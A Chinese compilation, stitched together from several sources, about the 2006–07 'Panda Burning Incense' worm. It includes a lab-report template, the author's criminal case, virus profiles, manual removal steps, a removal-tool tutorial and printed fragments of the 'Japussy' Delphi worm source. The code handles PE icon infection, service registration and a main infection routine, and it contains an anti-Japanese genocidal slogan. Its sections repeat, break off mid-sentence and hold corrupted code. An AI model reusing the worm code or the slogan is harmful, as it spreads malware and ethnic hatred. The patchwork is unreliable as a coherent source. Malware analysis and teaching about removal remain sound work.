信息安全熊猫烧香病毒剖析
《网络攻击与防御》
实验报告
计算机科学与技术学院
计算机系网络教研室制
实验报告撰写要求
实验操作是教学过程中理论联系实际的重要环节,而实验报告的撰写又是知识系统化的吸收和升华过程,因此,实验报告应该体现完整性、规性、正确性、有效性。现将实验报告撰写的有关容说明如下:
1、实验报告模板为电子版。
2、下载统一的实验报告模板,学生自行完成撰写和打印。报告的首页包含本次实验的一般信息:
●组号:例如:2-5 表示第二班第5组。
●实验日期:例如:05-10-06 表示本次实验日期。(年-月-日)……
●实验编号:例如:No.1 表示第一个实验。
●实验时间:例如:2学时表示本次实验所用的时间。
实验报告正文部分,从六个方面(目的、容、步骤等)反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式,学生只需在相应项填充即可。续页不再需要包含首页中的实验一般信息。
3、实验报告正文部分具体要求如下:
一、实验目的
本次实验所涉及并要求掌握的知识点。
二、实验环境
实验所使用的设备名称及规格,网络管理工具简介、版本等。
三、实验内容与实验要求
实验内容、原理分析及具体实验要求。
四、实验过程与分析
根据具体实验,记录、整理相应命令、运行结果等,包括截图和文字说明。
详细记录在实验过程中发生的故障和问题,并进行故障分析,说明故障排除的过程及方法。
五、实验结果总结
对实验结果进行分析,完成思考题目,总结实验的心得体会,并提出实验的改进意见。
六、附录
1)掌握熊猫烧香病毒的工作原理和感染方法;2)掌握手工清除熊猫病毒的基本方法。
目标主机为windows-2003 所用到的工具
o Wsyscheck
o Filemon
三、实验容与实验要求
蠕虫原理
1)蠕虫定义
2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
蠕虫病毒是自包含的程序(或是一套程序),它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。
请注意,与一般病毒不同,蠕虫不需要将其自身附着到宿主程序,有两种类型的蠕虫:主机蠕虫与网络蠕虫。主计算机蠕虫完全包含在它们运行的计算机中,并且使用网络的连接仅将自身拷贝到其他的计算机中,主计算机蠕虫在将其自身的拷贝加入到另外的主机后,就会终止它自身(因此在任意给定的时刻,只有一个蠕虫的拷贝运行),这种蠕虫有时也叫"野兔"。
蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网环境下进行传播,病毒的传染能力主要是针对计算机的文件系统而言,而蠕虫病毒的传染目标是互联网的所有计算机。局域网条件下的共享文件夹,电子email,网络中的恶意网页,大量存在着漏洞的服务器等都成为蠕虫传播的良好途径。
蠕虫和传统病毒的区别:
?传统病毒主要攻击的是文件系统,在其传染的过程中,计算机使用者是传染的触发者,是传染的关键环节,使用者计算机知识水平的高低常常决定了传统病毒所能造成的破坏程度;
?蠕虫主要是利用计算机系统漏洞进行传染,在搜索到网络中存在漏洞的计算机后,主动进行攻击。在传染的过程中,与计算机操作者是否进行操作无关,从而与使用者的计算机知识水平无关。
2)蠕虫的基本程序结构
?传播模块:负责蠕虫的传播,通过检查主机或远程计算机的地址库,找到可进一步传染的其他计算机。
?隐藏模块:侵入主机后,隐藏蠕虫程序,防止被用户发现。
?目的功能模块:实现对计算机的控制、监视或破坏等功能。
传播模块由可以分为三个基本模块:扫描模块、攻击模块和复制模块。蠕虫程序功能模型也可以扩展为如下的形式:
3)蠕虫程序的一般传播过程
?扫描:由蠕虫的扫描功能模块负责探测存在漏洞的主机。当程序向某个主机发送探测漏洞的信息并收到成功的反馈信息后,就得到一个可传播的对象。
?攻击:攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象,取得该主机的权限(一般为管理员权限),获得一个shell。
?复制:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。
蠕虫将自身复制到某台计算机之前,也会试图判断该计算机以前是都已被感染过。在分布式系统中,蠕虫可能会以系统程序名或不易被操作系统察觉的名字来为自己命名,从而伪装自己。同时,我们也可以看到,传播模块实现的实际
上是自动入侵的功能。所以蠕虫的传播技术是蠕虫技术的首要技术,没有蠕虫的传播技术,也就谈不上什么蠕虫技术了。
“熊猫烧香”蠕虫病毒
1)“熊猫烧香”档案
又名:尼亚姆、男生、worm.whBoy、worm.nimaya
后又化身为:“金猪报喜”
病毒类型:蠕虫病毒
影响系统:Windows 9X/ME/NT/2000/XP/2003/Vista/7
2)“熊猫烧香”病毒特点
2006年底,我国互联网上大规模爆发“熊猫烧香”病毒及其变种,该病毒通过多种方式进行传播,同时该病毒还具有盗取用户游戏账号、QQ账号等功能。该病毒传播速度快,危害围广,截至案发为止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。《瑞星2006安全报告》将其列为十大病毒之首,在《2006年度中国计算机病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。
熊猫烧香案例分析
熊猫烧香案例分析 一、基本案情 被告人李俊于2003年开始自学计算机编程技术,并经常向自己的好朋友、也是本案被告人之一的雷磊请教。2006年10月,被告人李俊从武汉某软件技术开发培训学校毕业后,便将自己以前在国外某网站下载的计算机病毒源代码调出来进行研究、修改,在对此病毒进行修改的基础上完成了“熊猫烧香”电脑病毒的制作,并采取将该病毒非法挂在别人网站上及赠送给网友等方式在互联网上传播。“熊猫烧香”病毒具有本机感染功能、局域网感染功能及u盘感染功能,并能中止许多反病毒软件和防火墙的运行,中了该病毒的电脑会自动链接访问指定的网站、下载恶意程序等。其后,李俊请雷磊对该病毒提修改建议。雷磊认为该病毒存在两个问题,一是改变被感染文件的图标,二是没有隐藏病毒进程。电脑感染了该病毒后,很容易被电脑用户发现,建议李俊从这两个方面对“熊猫烧香”病毒进行修改,但没有告诉李俊具体的修改方法。2006年11月中旬,李俊在互联网上叫卖该病毒,同时也请被告人王磊及其他网友帮助出售该病毒。王磊、李俊及其网友一共卖出了约三十个“熊猫烧香”病毒。其中,王磊帮李俊卖出了三个“熊猫烧香”病毒,并先后三次共汇款给李俊人民币1450元。此外,李俊还赠送给其他网友约十个“熊猫烧香”病毒。随着病毒的出售和赠送给网友,“熊猫烧香”病毒迅速在互联网上传播,导致自动链接访问李俊个人网站的流量大幅上升。王磊得知此情形后,提出为李俊卖“流量”,并联系被告人张顺购买李俊网站的“流量”,所得收入由王磊和李俊平分。为了提高访问李俊网站的速度,减少网络拥堵,王磊和李俊商量后,由王磊化名董磊为李俊的网站在南昌锋讯网络科技有限公司租了一个2G内存、百兆独享线路的服务器,租金由李俊、王磊每月各负担800元。张顺购买李俊网站的流量后,先后将九个游戏木马(也就是盗号木马)通过互联网发给王磊,王磊将这九个游戏木马转发给李俊,然后由李俊将这九个游戏木马挂在其个人网站上,盗取自动链接访问其网站的游戏玩家的“游戏信封(即含有游戏账号和密码的电子邮件)”,游戏木马将盗取的“游戏信封”自动地发给张顺,张顺则将盗取的“游戏信封”进行拆封、转卖,从而获取利益。 2006年12月初,李俊按照雷磊的建议修改“熊猫烧香”病毒,由于技术方面的原因,修改后的病毒虽然可以不改变别人的图标,但会使别人的图标变花、变模糊,并且隐藏病毒
熊猫烧香病毒源代码
“熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。 program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe
} IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为Win9x }
熊猫烧香病毒源代码
“熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。 program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): In teger; stdcall; external 'Kernel32.dll'; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为Win9x } function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; { 在流之间复制} procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TSt ream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; { 将宿主文件从已感染的PE文件中分离出来,以备使用} procedure Extract: string); var sStream, dStream: T; begin
从熊猫烧香病毒看现在的网络安全问题
从熊猫烧香病毒看现在的网络安全问题 马涛20082161 08110812 一、网络安全的定义 网络系统的硬件、软件及其中数据受到保护,不受偶然的或者恶意的破坏、更改、泄露,保证系统连续可靠地运行,网络服务不中断的措施。 网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。网络安全是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性学科。 二、主要特性 网络安全应具有以下五个方面的特征: 保密性:信息不泄露给非授权用户、实体或过程,或供其利用的特性。 完整性:数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。 可用性:可被授权实体访问并按需求使用的特性。即当需要时能否存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击; 可控性:对信息的传播及内容具有控制能力。 可审查性:出现的安全问题时提供依据与手段 熊猫烧香是一种经过多次变种的蠕虫病毒变种,2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写,2007年1月初肆虐网络,它主要通过下载的档案传染。
对计算机程序、系统破坏严重。 基本信息 病毒名称:熊猫烧香,Worm.WhBoy.(金山称),Worm.Nimaya. 病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”,国外称“熊猫烧香” 危险级别:★★★★★病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista 发现时间:2006年10月16日来源地:中国武汉东西湖高新技术开发区关山 病毒描述 其实是一种蠕虫病毒的变种,而且是经过多次变种而来的。尼姆亚变种W(Worm.Nimaya.w),由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为 “熊猫烧香”病毒。但原病毒只会对EXE图标进行替换,并不会对系统本身进行破坏。而大多数是中的病毒变种,用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。 中毒症状 除了通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
信息安全 熊猫烧香病毒剖析
《网络攻击与防御》 实验报告 计算机科学与技术学院 计算机系网络教研室制
实验报告撰写要求 实验操作是教学过程中理论联系实际的重要环节,而实验报告的撰写又是知识系统化的吸收和升华过程,因此,实验报告应该体现完整性、规范性、正确性、有效性。现将实验报告撰写的有关内容说明如下: 1、实验报告模板为电子版。 2、下载统一的实验报告模板,学生自行完成撰写和打印。报告的首页包含本次实验的一般信息: ●组号:例如:2-5 表示第二班第5组。 ●实验日期:例如:05-10-06 表示本次实验日期。(年-月-日)…… ●实验编号:例如:No.1 表示第一个实验。 ●实验时间:例如:2学时表示本次实验所用的时间。 实验报告正文部分,从六个方面(目的、内容、步骤等)反映本次实验的要点、要求以及完成过程等情况。模板已为实验报告正文设定统一格式,学生只需在相应项内填充即可。续页不再需要包含首页中的实验一般信息。 3、实验报告正文部分具体要求如下: 一、实验目的 本次实验所涉及并要求掌握的知识点。 二、实验环境 实验所使用的设备名称及规格,网络管理工具简介、版本等。 三、实验内容与实验要求 实验内容、原理分析及具体实验要求。 四、实验过程与分析 根据具体实验,记录、整理相应命令、运行结果等,包括截图和文字说明。 详细记录在实验过程中发生的故障和问题,并进行故障分析,说明故障排除的过程 及方法。 五、实验结果总结 对实验结果进行分析,完成思考题目,总结实验的心得体会,并提出实验的改进意见。 六、附录
1)掌握熊猫烧香病毒的工作原理和感染方法;2)掌握手工清除熊猫病毒的基本方法。
熊猫烧香病毒及祸害
熊猫烧香病毒及祸害
熊猫烧香病毒及祸害 “熊猫烧香”,是一种经过多次变种的蠕虫病毒变种,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,下面由我给你做出详细的介绍!希望对你有帮助! 熊猫烧香病毒: 该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写,2007年1月初肆虐网络,它主要透过下载的文件传染。2007年2月12日,湖北省公安厅宣布,李俊以及其同伙共8人已经落网,这是中国警方破获的首例计算机病毒大案。[1]2014年,“熊猫烧香”之父因涉案网络赌场,获刑5年。 中文名熊猫烧香 程序类别计算机病毒 编写者李俊
病毒类型蠕虫病毒新变种 外文名Worm.WhBoy或Worm.Nimaya 感染系统Win9x/2000/NT/XP/2003/Vista/7 泛滥时间2006年底2007年初 1基本介绍编辑 病毒名称:熊猫烧香,Worm.WhBoy.金山称,Worm.Nimaya。瑞星称 病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”,国外称“熊猫烧香” 危险级别:★★★★★ 病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。 影响系统:Windows 9x/ME、Windows 2000/NT、Windows XP、Windows 2003 、Windows Vista 、Windows 7 发现时间:2006年10月16日
熊猫烧香病毒之专杀工具编写教程方案
熊猫烧香病毒之专杀工具的编写教程 通过对熊猫烧香的行为分析,这里仅针对所得结果,来进行专杀工具的编写。本节课我们会学习使用C++来写一个简单的“熊猫烧香”专杀系统。 实验目的: 结合本篇文章的知识点,能够彻底掌握文章所讲述的编写杀毒软件的方法。 实验思路: 1.理解专杀工具所需要实现的功能 2.利用VC++编写专杀工具 3.结合Process Monitor验证专杀工具 实验步骤: 1、病毒行为回顾与归纳 这里我们首先回顾一下病毒的行为: **病毒行为1:**病毒本身创建了名为`spoclsv.exe`的进程,该进程文件的路径为: C:WINDOWSsystem32driversspoclsv.exe **病毒行为2:**在命令行模式下使用`net share`命令来取消系统中的共享。 **病毒行为3:**删除安全类软件在注册表中的启动项。 **病毒行为4:** 在注册表:HKCUSoftwareMicrosoftWindowsCurrentVersionRun中创建svcshare 用于在开机时启动位于`C:WINDOWSsystem32driversspoclsv.exe`的病毒程序。 **病毒行为5:**修改注册表,使得隐藏文件无法通过普通的设置进行显示,该位置为:HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL 病毒将`CheckedValue`的键值设置为了0。 **病毒行为6:**将自身拷贝到根目录,并命名为`setup.exe`,同时创建`autorun.inf`用于病毒的启动,这两个文件的属性都是“隐藏”。
实验七 典型病毒(熊猫烧香)的检测和清除
实验七典型病毒(熊猫烧香)的检测和清除 一、实验目的 掌握典型病毒的检测方法,掌握典型病毒-熊猫烧香病毒的检测方法 二、实验环境 微机1台,熊猫烧香病毒样本、熊猫烧香病毒专杀工具、VMWare虚拟机软件。 三、实验步骤与方法 1)熊猫烧香病毒的检测 1、备好病毒样本 带有熊猫烧香病毒的文件。 2、运行VMWare虚拟机软件。 为了整个计算机本身的安全或整个实验室系统的安全,让实验在虚拟的环境下进行, 3、检测干净系统 4、种植熊猫烧香病毒 点击含有熊猫烧香病毒文件夹下的setup.exe文件,这时就将熊猫烧香病毒种植到计算机系统中了。 5、检测中毒后的系统 得出实验结论 2)熊猫烧香病毒的清除 (1) 熊猫症状表现为: (1.1) 某些EXE文件的图标被改成一个座立的熊猫手里捧着三根香,因此得名,
(1.2) 隐藏文件属性无法修改,即显示所有隐藏文件的勾选去掉也不能显示隐藏文件;(1.3) 双击分区盘符无法打开显示内容,必须通过右键打开才可以打开; 如果你的电脑出现以上症状那一定是中着了!可以通过以下用超级巡警之熊猫烧香病毒专杀V1.8自动删除和清理病毒(删除前断开网络) 拓展资料:手工清除方法 (2.1) 清除病毒 第一步:点击“开始--运行”,输入"ntsd -c q -pn spoclsv.exe"并确定,结束病毒的进程。(或进入到文件夹c:\windows(Windows2000下为winnt, windowsXP下为windows)\system32 \drivers中修改spoclsv.exe的文件名为其他的.exe文件),之后我们就可以进入到任务管理器和注册表中了。 第二步:在注册表中寻找“HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\C URRENTVersion\Explorer\Advanced\Folder\Hidden\SHOWALL”,将CheckedValue的值改为1。打开“HKEY_CURRENT_USER\Software\Microsoft\Windows\CrrentVersion\Run”,将svcs hare的项目删除。 第三步:删除硬盘各分区根目录下的"setup.exe"和"autorun.inf"文件;删除掉C:\Windows\ system32\drivers下的spoclsv.exe文件。 第四步:搜索硬盘上的网页格式文件,找到其中类似”“的文字,将其删除。被嵌入的代码可能是其他的网站。 (2.2) 显示出被隐藏的系统文件
熊猫烧香(源代码)
(一) 主程序段分析 原“熊猫烧香”病毒“源码”主程序段代码如下所示: {==================主程序开始====================} begin if IsWin9x then //是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 else //WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then InfectFiles //感染和发邮件 else //已寄生于宿主程序上了,开始工作 begin TmpFile := ParamStr(0); //创建临时文件……....Line n Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格 ExtractFile(TmpFile); //分离之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7 InfectFiles; //感染和发邮件 end; end. 对于代码: RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 虽然源码提供者省略了相应实现,但这是比较基本的编程实现。通过把自身注册为服务进程,可以使自己随着系统的启动一起启动。当然,还可以进一步施加技巧而使自己从Windows 任务管理器下隐藏显示。然后,上面代码在判断当前操作系统不是Win9X后,提到“远程线程映射到Explorer进程”一句。其实这里所用Jeffrey Richter所著《Windows 95 Windows NT 3.5 高级编程技术》(后多次更句)一书第16章“闯过进程的边界”中详细讨论的“使用远程线来注入一个DLL”技术。如今,只要上网GOOGLE一下“远程线程映射技术”即出现大量实片断,故在不再赘述。那么,它(包括其它许多病毒)为什么要映射到Explorer进程呢?原来,Explorer(注:Windows资源管理器的名字也是Explorer.exe,但并不是一回事!)进程在Windows系统中举足轻重—Windows在启动过程中都会随同激活一个名为Explorer.exe的进程。它用于管理Windows图形外壳,包括开始菜单、任务栏、桌面和文件管理等,损坏或删除该程序会导致Windows图形界面无法适用。注:这并不是说Windows的运行根本离开它;但删除掉这个程序后,整个Windows桌面无法再用,而对于普通用户也感觉到好象法再使用Windows了。 另注:VCL函数Paramstr(n)的作用是返回当前可执行文件指定的命令行参数;当n=0时,返回当前可执行文件名(包含完整的路径)。因此,上面代码中从n行到第n+7行的作用是,从已感染的宿主程序中分离出原无染程序代码部分,并启动此无染程序。这是病毒的重要伪
熊猫烧香图标病毒详解
最近出现新的病毒名为熊猫烧香,危害较大,感染后所有EXE可执行文件图标变成一个烧香的熊猫,大家电脑如出现此现象可认真阅读以下文章: 一、病毒描述: 含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。 二、病毒基本情况: [文件信息] 病毒名: Virus.Win32.EvilPanda.a.ex$ 大小: 0xDA00 (55808), (disk) 0xDA00 (55808) SHA1 : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D 壳信息: 未知 危害级别:高 病毒名: Flooder.Win32.FloodBots.a.ex$ 大小: 0xE800 (59392), (disk) 0xE800 (59392) SHA1 : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D 壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24 危害级别:高 三、病毒行为: Virus.Win32.EvilPanda.a.ex$ : 1、病毒体执行后,将自身拷贝到系统目录: %SystemRoot%system32FuckJacks.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Userinit
计算机病毒分析与处理
计算机病毒分析与处理 一、 计算机病毒基础 ?计算机病毒的定义、特征、结构及其分类 ?计算机病毒的入侵方式及生命周期 ?计算机病毒的传播途径 ?计算机病毒的命名规则 ?计算机病毒的加载方式 二、 计算机病毒的定义 人为编制的,干扰计算机正常运行并造成计算机软硬件故障,甚至破坏计算机数据的可以自我复制的计算机程序或者指令集合都是计算机病毒。 三、 计算机病毒的特征 四、 计算机病毒的表现性体现:“中国黑客”病毒
五、 计算机病毒的表现性体现:“女鬼”病毒 六、 计算机病毒的表现性体现:“白雪公主”病毒
七、 计算机病毒的表现性体现:“熊猫烧香”病毒
八、 常见病毒分类 ?引导型病毒--MBR病毒、BR病毒 软(U)盘 硬盘 软(U)盘 ?文件型病毒 ?源码型病毒 ?嵌入型病毒 ?外壳型病毒 ?混合型病毒(又称复合型) 九、 具有代表性的病毒类型 ?宏病毒:感染word、excel文件,驻留Normal模板 ?蠕虫病毒 ?特洛伊木马病毒 ?流氓软件 十、 计算机病毒的入侵方式 ?源代码嵌入攻击
?代码取代攻击 ?外壳寄生入侵 ?系统修改入侵 十一、 计算机病毒的生命周期 十二、 计算机病毒的传播途径 ?网络 ?移动存储介质 ?硬盘 ?光盘 ?点对点通信系统和无线通道 十三、 计算机病毒的命名、 组成病毒名称的六个字段: 主行为类型.子行为类型.宿主文件类型.主名称.版本信息.主名称变种号 十四、 病毒的主/子行为类型及其对应关系 ?Backdoor ?Worm
?Trojan ?Virus ?Harm ?Dropper ?Hack ?Binder 1.病毒现象实例1 病毒名称:Backdoor 病毒中文名称:后门 病毒介绍:指在用户不知道也不允许的情况下,在被感染的系统上以隐蔽的方式运 行可以对被感染的系统进行远程控制,而且用户无法通过正常的方法禁止其运行。 “后门”其实是木马的一种特例,它们之间的区别在于“后门”可以对被感染的系 统进行远程控制(如:文件管理、进程控制等)。 2.病毒现象实例2 病毒名称:worm 病毒中文名称:蠕虫 病毒介绍:指利用系统的漏洞、外发邮件、共享目录、可传输文件的软件(如:MSN、OICQ、IRC等)、可移动存储介质(如:U盘、软盘),这些方式传播自己的病毒。这种类型的病毒其子型行为类型用于表示病毒所使用的传播方式。 3.病毒现象实例3 病毒名称 :Trojan 病毒中文名称:木马 病毒介绍:特洛伊木马(简称木马)是以盗取用户个人信息,甚至是远程控制用户 计算机为主要目的的恶意代码。由于它像间谍一样潜入用户的电脑,与战争中的“木 马”战术十分相似,因而得名木马。按照功能,木马程序可进一步分为:盗号木马 、网银木马 、窃密木马 、远程控制木马 、流量劫持木马 和其它木马六类。 4.病毒现象实例4 病毒名称:Virus
熊猫烧香病毒介绍
熊猫烧香病毒介绍 【基本信息】 病毒名称:熊猫烧香,Worm.WhBoy.(金山称),Worm.Nimaya.(瑞星称)病毒别名:尼姆亚,武汉男生,后又化身为“金猪报喜”,国外称“熊猫烧香” 危险级别:★★★★★ 病毒类型:蠕虫病毒,能够终止大量的反病毒软件和防火墙软件进程。 影响系统:Win 9x/ME、Win 2000/NT、Win XP、Win 2003 、Win Vista “熊猫烧香”的制造者 熊猫烧香病毒的制造者-李俊 一个水泥厂技校毕业的中专生,一个从未接受过专业训练的电脑爱好者,一个被杀毒软件公司拒之门外的年轻人,查毒了小半个中国互联网。如果不是地震引发海底光缆故障,那只颔首敬香的“熊猫”,还将“迁徙”到更远的地方。 家人眼中的李俊: 李俊的父母一直在家乡一水泥厂上班,几前年双双下岗,他妈妈做了个小推车在街上卖早点,他爸爸则到了一家私人瓦厂打工。52岁的李俊妈妈陈女士说,李俊很小的时候就喜欢玩电脑,没事就到网吧去玩,因为怕他在外面学坏,家里就给他买了台电脑。没想到到头来儿子却是因为“玩电脑”被警察抓走,陈女士感到悔恨不已。 李俊的父亲则说,四五岁时,李俊爱上了玩积木及拆卸家中的小机械,那时候,李俊将家中的收音机、闹钟、手电筒等凡是能拆开的物品,都拆成一个个零部件,歪着脑袋观察每个零部件后,又将零部件重新组装起来,恢复原样。如果闹钟再次走动或收音机能发出声音时,李俊往往会拍手大笑,自顾自庆祝半天。 李俊的弟弟李明比他小三岁,西南民族大学音乐教育专业学生,今年放寒假回家,他偶尔和哥哥提起最近他和同学都中过的“熊猫烧香”电脑病毒。哥哥听说后却一改以往的内向和谦卑,不屑一故地笑说:“这病毒没什么大不了。”当时李明并没有想到,他的哥哥就是“熊猫烧香”的始作俑者。 李明告诉记者,哥哥在上学时数学和英语非常优秀,尽管如此,哥哥还是没能考上高中,而是进了水泥厂里自办的一所技校(现已改名为“娲石职业技术学校”),后于2 000年到武汉一家电脑城打工后,自己有了收入,但他很少给家人钱花。在李明的记忆中,哥哥从不找父母要钱花。有人曾对李俊说,李明是他弟弟,他应该给李明点零花钱。李俊总是很严肃地说:“钱要靠自己挣!挣不到钱的人,是无能的人。” 【病毒描述】
河大版-信息技术-四年级下册-熊猫烧香病毒简介
熊猫烧香 熊猫烧香跟灰鸽子不同,这是名副其实的病毒,是一种经过多次变种的“蠕虫病毒”变种,2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写,拥有感染传播功能,2007年1月初肆虐网络,它主要通过下载的档案传染,受到感染的机器文件因为被误携带间接对其他计算机程序、系统破坏严重。2013年6月病毒制造者张顺和李俊因伙同他人开设网络赌场,再次获刑。 病毒原理 熊猫烧香 其实是一种蠕虫病毒的变种,而且是经过多次变种而来的,由于中毒计算机的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。但原病毒只会对EXE图标进行替换,并不会对系统本身进行破坏。而大多数是中等病毒变种,用户计算机中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的备份文件。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。 中毒症状 中毒时的电脑桌面 除通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以
